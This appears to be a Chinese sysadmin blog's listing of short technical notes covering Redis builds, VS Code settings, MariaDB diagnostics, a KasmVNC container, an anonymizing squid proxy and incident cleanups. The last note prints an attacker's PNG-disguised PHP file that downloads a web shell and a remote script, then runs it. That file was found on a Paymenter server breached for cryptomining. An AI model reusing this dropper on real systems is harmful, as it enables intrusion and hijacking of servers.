debian源的版本比较老,而且redis-redisearch更老。
安装新版本ReJSON和RediSearch啥都有, 就是启动服务的时候官方service加载search就会卡住。
cd /tmp
VER=$(curl -Ss https://api.github.com/repos/redis/redis/releases/latest|grep tag_name|grep -Po '[0-9]+\.[0-9]+\.[0-9]+.*(?=")')
wget https://github.com/redis/redis/archive/refs/tags/${VER}.tar.gz -O - | tar xz
cd redis-${VER}
export BUILD_TLS=yes
export BUILD_WITH_MODULES=yes
export INSTALL_RUST_TOOLCHAIN=yes
export DISABLE_WERRORS=yes
make -j "$(nproc)" all
make install
ln -s /usr/local/bin/redis-server /usr/bin/
cat>>/etc/redis/redis.conf<<EOF
loadmodule /usr/local/lib/redis/modules/redisbloom.so
loadmodule /usr/local/lib/redis/modules/redisearch.so
loadmodule /usr/local/lib/redis/modules/rejson.so
loadmodule /usr/local/lib/redis/modules/redistimeseries.so
EOF
cat>/etc/systemd/system/redis.service<<EOF
[Unit]
Description=Redis In-Memory Data Store
After=network.target
[Service]
ExecStart=/usr/local/bin/redis-server /etc/redis/redis.conf
ExecReload=/bin/kill -s HUP $MAINPID
Type=simple
User=root
Group=root
LimitNOFILE=10032
TimeoutStartSec=300
TimeoutStopSec=60
[Install]
WantedBy=multi-user.target
EOF
systemctl enable redis --now
/usr/local/bin/ #二进制目录
/etc/redis/redis.conf #配置文件目录
# Modules
module:name=search,ver=80402,api=1,filters=0,usedby=[],using=[ReJSON],options=[handle-io-errors]
module:name=vectorset,ver=1,api=1,filters=0,usedby=[],using=[],options=[handle-io-errors|handle-repl-async-load]
module:name=ReJSON,ver=80400,api=1,filters=0,usedby=[search],using=[],options=[handle-io-errors]
module:name=bf,ver=80400,api=1,filters=0,usedby=[],using=[],options=[handle-io-errors]
module:name=timeseries,ver=80400,api=1,filters=0,usedby=[],using=[],options=[handle-io-errors]
官方安装文档地址:
https://redis.io/docs/latest/operate/oss_and_stack/install/build-stack/almalinux-rocky-9/
https://redis.io/docs/latest/operate/oss_and_stack/install/build-stack/debian-bookworm/
https://redis.io/docs/latest/operate/oss_and_stack/install/build-stack/ubuntu-noble/
VScode扩展插件安装pretty-php
apt install php-cli php-mbstring -y
apt install tilix -y
#macos配置文件路径
/Users/用户名Library/Application\ Support/Code/User/settings.json
#Linux配置文件目录
/home/用户名/.config/Code/User/settings.json
{
"workbench.colorTheme": "Default Light Modern",
"editor.accessibilitySupport": "off",
"editor.formatOnType": true,
// ==== PHP ====
"[php]": {
"editor.defaultFormatter": "lkrms.pretty-php",
"editor.formatOnSave": true
},
// ==== HTML ====
"[html]": {
"editor.defaultFormatter": "vscode.html-language-features",
"editor.formatOnSave": true
},
// ==== TPL / 模板 ====
"files.associations": {
"*.tpl": "html",
"*.tpl.php": "html"
},
"html.format.indentInnerHtml": true,
"html.format.wrapLineLength": 600,
"html.format.templating": true,
"html.format.contentUnformatted": "script,style,pre,code,template,meta",
// ==== 编辑器外观 ====
"editor.fontFamily": "Menlo, Monaco, 'Courier New', JetBrains Mono, monospace",
"editor.fontSize": 14,
"continue.showInlineTip": false,
"editor.tokenColorCustomizations": {},
"editor.defaultFormatter": "lkrms.pretty-php",
"editor.formatOnPaste": true,
"css.format.braceStyle": "expand",
"amazonQ.allowFeatureDevelopmentToRunCodeAndTests": {
}
}
sudo apt update
sudo apt install -y \
build-essential \
cmake \
g++ \
git \
libssl-dev \
libboost-all-dev \
libjemalloc-dev \
pkg-config
sudo apt install build-essential llvm cmake libclang1 libclang-dev cargo
git clone --recursive https://github.com/RediSearch/RediSearch.git
cd RediSearch
sudo make setup
make build
git clone https://github.com/RedisJSON/RedisJSON.git
cd RedisJSON
make
编译太麻烦了从docker镜像直接拉现成的
podman pull docker.io/redislabs/redisearch:latest
podman run -d --name redisearch -p 6379:6379 docker.io/redislabs/redisearch:latest
none
#!/bin/bash
TOP_N=${2:-10}
PID=$(pgrep -o -x mysqld)
[ -z "$PID" ] && PID=$(pgrep -o -x mariadbd)
TID=`top -H -p $PID -b -n 1 | tail -n +8 | awk -v pid="$PID" '$1 != pid {printf "%s\t%s\n",$1,$9}' | sort -k2 -nr | head -n $TOP_N|awk '{ print $1 }'|paste -sd ',' -`
mariadb -h'127.0.0.1' -P'3306' -u'root' -p'密码' -e "SELECT * FROM information_schema.processlist WHERE tid IN ($TID) ORDER BY time DESC;"
根据MariaDB的PID查询出PID,再根据TID去information_schema.processlist里面找出对应的sql查询。
none
最近需遍历查看几十万个图片文件, 虽然能通过http进行遍历,但涉及到操作文件要另外写代码。
kasmweb的ubuntu-jammy-desktop镜像帮我省掉了很多事, 直接进去操作,整体很流畅。
podman run -d \
--restart=unless-stopped \
--name ubuntu-desktop \
--hostname ubuntu-desktop \
--shm-size=5120m \
-p 6901:6901 \
-e VNC_PW=password \
-e LANG=zh_CN.UTF-8 \
-e LANGUAGE=zh_CN:zh \
-e LC_ALL=zh_CN.UTF-8 \
-v /www:/www \
--user 0:0 \
docker.io/kasmweb/ubuntu-jammy-desktop:1.18.0
使用 --user 0:0 提权为root
-p是端口映射
容器启动后访问 https://IP:6901 有条件的做个反向代理
默认访问用户名是kasm-user密码则是 -e VNC_PW参数
进入root方法
podman exec -it -u root ubuntu-desktop bash
sudo -i
出现401验证错误解决办法
podman exec -it -u root ubuntu-desktop bash
#进入容器后重置密码
VNC_PW=密码
echo -e "${VNC_PW}\n${VNC_PW}\n" | kasmvncpasswd -u kasm_user -wo
echo -e "${VNC_PW}\n${VNC_PW}\n" | kasmvncpasswd -u kasm_viewer -r
备份vscode TG数据办法
mkdir /data/opt -p
podman cp ubuntu-desktop :/opt /data/opt
#重新创建容器加上参数
-v /data/opt:/opt \
重启容器
podman restart ubuntu-desktop
停止和删除容器
podman stop ubuntu-desktop
podman rm ubuntu-desktop
官方网址https://kasm.com/kasmvnc
docker镜像网址 https://hub.docker.com/r/kasmweb/ubuntu-jammy-desktop
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,likeGecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)
Baiduspider ( http://www.baidu.com/search/spider.htm)
Baiduspider-image+(+http://www.baidu.com/search/spider.htm)
Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html
Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html
none
发现缓存数量无限增多,好像是没有自动清除过期缓存,如果是SSD硬盘要注意大量文件读写问题导致过度消耗硬盘寿命。
最好还是redis缓存为好。
none
modprobe nbd max_part=8
qemu-nbd --connect=/dev/nbd0 /path/to/disk.qcow2
#fdisk -l /dev/nbd0
fsck -y /dev/nbd0p1
qemu-nbd --disconnect /dev/nbd0
none
提前安装好git和curl/wget
github项目https://github.com/echo094/decode-js
安装nodejs https://nodejs.org/en/download
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.3/install.sh | bash
\. "$HOME/.nvm/nvm.sh"
nvm install 22
拉取decode-js安装依赖
git clone https://github.com/echo094/decode-js
cd decode-js
node i
jsjiami.com.v6为例子
npm run decode -- -t sojson -i 加密脚本.js -o 明文.js
none
最近接了几个运维的活, 更新内核的时候 dracut生成 initrd失败,大量出现关键词libutilkeybd.so
追溯文件日期是9月21日,起初还以为是AlmaLinux的问题。
除了dracut,用ldd和losf也能看到被注入。
清空ld.so.preload和删除文件后系统正常了。
ldd /usr/lib64/libssl.so.3.2.2
linux-vdso.so.1 (0x00007ffdba2f8000)
/var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so (0x00007f9486200000)
libcrypto.so.3 => /lib64/libcrypto.so.3 (0x00007f9485c00000)
libc.so.6 => /lib64/libc.so.6 (0x00007f9485800000)
libdl.so.2 => /lib64/libdl.so.2 (0x00007f94864d5000)
libz.so.1 => /lib64/libz.so.1 (0x00007f94864bb000)
/lib64/ld-linux-x86-64.so.2 (0x00007f94865cb000)
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
bash 7749 root mem REG 259,4 33816 11535609 /var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so
lsof 36787 root mem REG 259,4 33816 11535609 /var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so
grep 36788 root mem REG 259,4 33816 11535609 /var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so
lsof 36789 root mem REG 259,4 33816 11535609 /var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so
解决方法
rm -f /var/adm/*/kernel/libutilkeybd.so
echo>/etc/ld.so.preload
none
yum -y install squid
mkdir -p /var/log/squid/{logs,coredump_dir,cache_dir}
chown squid.squid -R /var/log/squid/
for i in `hostname -I`; do echo tcp_outgoing_address ${i} random_ip;done > /etc/squid/ip.list
systemctl enable squid
cat>/etc/squid/squid.conf<<EOF
acl manager proto cache_object
acl localhost src 127.0.0.1/32 ::1
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
#白名单
include /etc/squid/allow.list
acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
# set out - ip 配置出口IP
#acl localnet src 0.0.0.0/0
acl random_ip random 1/2
acl random_ip random 1/3
acl random_ip random 1/4
acl random_ip random 1/5
acl random_ip random 1/6
acl random_ip random 1/7
acl random_ip random 1/8
acl random_ip random 1/9
acl random_ip random 1/10
acl random_ip random 1/11
acl random_ip random 1/12
acl random_ip random 1/13
acl random_ip random 1/14
acl random_ip random 1/15
acl random_ip random 1/16
acl random_ip random 1/17
acl random_ip random 1/18
acl random_ip random 1/19
acl random_ip random 1/20
server_persistent_connections off
http_access deny manager
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow allowip
http_access deny all
# 设置代理端口
http_port 3228
include /etc/squid/ip.list
dns_nameservers 8.8.8.8
visible_hostname aliserver
request_header_access Via deny all
request_header_access X-Forwarded-For deny all
cache_mem 100 MB
cache_swap_low 90
cache_swap_high 95
cache_dir ufs /var/log/squid/cache_dir 100 16 256
cache_access_log /var/log/squid/logs/access.log
cache_log /var/log/squid/logs/cache.log
cache_store_log /var/log/squid/logs/store.log
coredump_dir /var/log/squid/coredump_dir
pid_filename /var/log/squid/squid.pid
# Add any of your own refresh_pattern entries above these.
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern . 0 20% 4320
EOF
添加白名单IP段
addlist(){
echo "acl allowip src $1">> /etc/squid/allow.list
}
addlist 123.456.789.0/24 #添加白名单IP段
官方网站https://cn.angie.software/
现成二进制包https://cn.angie.software/angie/docs/installation/oss_packages/
官方网站上介绍是由前 nginx 开发者创建
官方介绍是支持Prometheus ACME HTTP3 这个几个功能太实用了, lua njs都已经打包好可用。
目前不知道angie和freenginx之间是啥关系。
https://amphp.org/websocket-server
none
#!/bin/bash
# Define the array device
ARRAY="/dev/md10"
# Check if the array is active
if ! mdadm --detail "$ARRAY" >/dev/null 2>&1; then
echo "ERROR: Array $ARRAY is not active or does not exist."
exit 1
fi
# Check the array status
STATUS=$(mdadm --detail "$ARRAY" | awk -F': ' '/State/ {print $2}' | tr -d '[:space:]')
if [[ "$STATUS" =~ (degraded|recovering|resyncing|inactive) ]]; then
echo "⚠️ WARNING: Array $ARRAY is in a problematic state! -> $STATUS"
exit 2
elif [[ "$STATUS" =~ (clean|active) ]]; then
echo "✅ INFO: Array $ARRAY is healthy ($STATUS)"
exit 0
else
echo "❓ UNKNOWN: Unable to determine RAID state ($STATUS)"
exit 3
fi
none
上半年装了一个体验一下丢着一直没管,今天上去发现有挖矿进程。
漏洞具体细节:https://cve.imfht.com/detail/CVE-2025-58048
root@localhost:/tmp# lsof -p 1479735
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
xmrig 1479735 paymenter cwd DIR 254,3 117 15784149 /home/paymenter/storage/app/public/ticket-attachments
xmrig 1479735 paymenter rtd DIR 254,3 298 128 /
xmrig 1479735 paymenter txt REG 254,3 8334576 15784153 /home/paymenter/storage/app/public/ticket-attachments/xmrig
xmrig 1479735 paymenter mem REG 254,3 561 3231722 /usr/share/zoneinfo/Asia/Shanghai
xmrig 1479735 paymenter mem REG 0,14 70684614 anon_inode:[io_uring] (stat: No such file or directory)
xmrig 1479735 paymenter 0r CHR 1,3 0t0 4 /dev/null
xmrig 1479735 paymenter 1w FIFO 0,13 0t0 70686037 pipe
xmrig 1479735 paymenter 2w FIFO 0,13 0t0 70685837 pipe
xmrig 1479735 paymenter 3u a_inode 0,14 0 1048 [eventpoll:9,11,13,14,15]
xmrig 1479735 paymenter 4u unix 0x00000000bd7e1641 0t0 26784 type=STREAM (CONNECTED)
xmrig 1479735 paymenter 5u a_inode 0,14 0 70684614 [io_uring]
xmrig 1479735 paymenter 6r REG 254,3 215 15784150 /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
xmrig 1479735 paymenter 7r FIFO 0,13 0t0 70684615 pipe
xmrig 1479735 paymenter 8w FIFO 0,13 0t0 70684615 pipe
xmrig 1479735 paymenter 9r FIFO 0,13 0t0 70684616 pipe
xmrig 1479735 paymenter 10w FIFO 0,13 0t0 70684616 pipe
xmrig 1479735 paymenter 11u a_inode 0,14 0 1048 [eventfd:17]
xmrig 1479735 paymenter 12r CHR 1,3 0t0 4 /dev/null
xmrig 1479735 paymenter 13u a_inode 0,14 0 1048 [eventfd:25]
xmrig 1479735 paymenter 14u a_inode 0,14 0 1048 [eventfd:27]
xmrig 1479735 paymenter 15u IPv4 102158557 0t0 TCP XXXXXXX:53580->252.104.20.157.sg.kuroit.com:https (ESTABLISHED)
root@localhost:/tmp# cat /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
@PNG
<?php
system("wget https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php");
system("wget https://bestvip.pt/storage/ticket-attachments/script.sh");
system("bash script.sh")
?>
阅读剩余部分...
- 1
- 2
- 3
- 4
- ...
- 59
- »
